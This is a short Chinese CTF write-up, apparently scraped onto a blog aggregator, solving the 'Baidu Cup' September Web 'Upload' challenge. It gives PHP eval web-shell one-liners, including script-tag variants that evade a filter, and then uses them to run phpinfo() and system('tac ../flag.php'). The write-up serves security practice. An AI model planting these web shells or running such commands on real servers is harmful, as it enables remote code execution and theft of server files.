当前位置:网站首页>“百度杯”CTF比赛 九月场,Web:Upload
“百度杯”CTF比赛 九月场,Web:Upload
2022-07-05 13:00:00 【Part 02】
题目内容:
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
<?php @eval($_POST['Pai']);?>

<script language="pphphp">@eval($_POST['Pai']);</script>

<script language="PHP">@eval($_POST['Pai']);</script>
此时页面和源码都看不到代码了,直接 post
Pai=phpinfo();

正常命令执行获取 flag
system('tac ../flag.php');
边栏推荐
- AVC1与H264的区别
- Overflow toolbar control in SAP ui5 view
- How to choose note taking software? Comparison and evaluation of notion, flowus and WOLAI
- C# 对象存储
- mysql econnreset_ Nodejs socket error handling error: read econnreset
- APICloud Studio3 WiFi真机同步和WiFi真机预览使用说明
- Changing JS code has no effect
- 国际自动机工程师学会(SAE International)战略投资几何伙伴
- Actual combat simulation │ JWT login authentication
- Introduction aux contrôles de la page dynamique SAP ui5
猜你喜欢

Detailed explanation of navigation component of openharmony application development

Introduction aux contrôles de la page dynamique SAP ui5

Pycharm installation third party library diagram

峰会回顾|保旺达-合规和安全双驱动的数据安全整体防护体系

《2022年中国银行业RPA供应商实力矩阵分析》研究报告正式启动

Principle and performance analysis of lepton lossless compression

Word document injection (tracking word documents) incomplete

蜀天梦图×微言科技丨达梦图数据库朋友圈+1

阿里云SLB负载均衡产品基本概念与购买流程

【每日一题】1200. 最小绝对差
随机推荐
CloudCompare——点云切片
RHCSA9
A deep long article on the simplification and acceleration of join operation
Get to know linkerd project for the first time
山东大学暑期实训一20220620
SAP UI5 ObjectPageLayout 控件使用方法分享
Rocky基础知识1
Rocky基础命令3
155. Minimum stack
Yyds dry inventory JS intercept file suffix
Simple page request and parsing cases
时钟周期
Realize the addition of all numbers between 1 and number
Concurrent performance test of SAP Spartacus with JMeter
【Hot100】33. 搜索旋转排序数组
946. Verify stack sequence
Default parameters of function & multiple methods of function parameters
Principle and performance analysis of lepton lossless compression
【每日一题】1200. 最小绝对差
MySQL giant pit: update updates should be judged with caution by affecting the number of rows!!!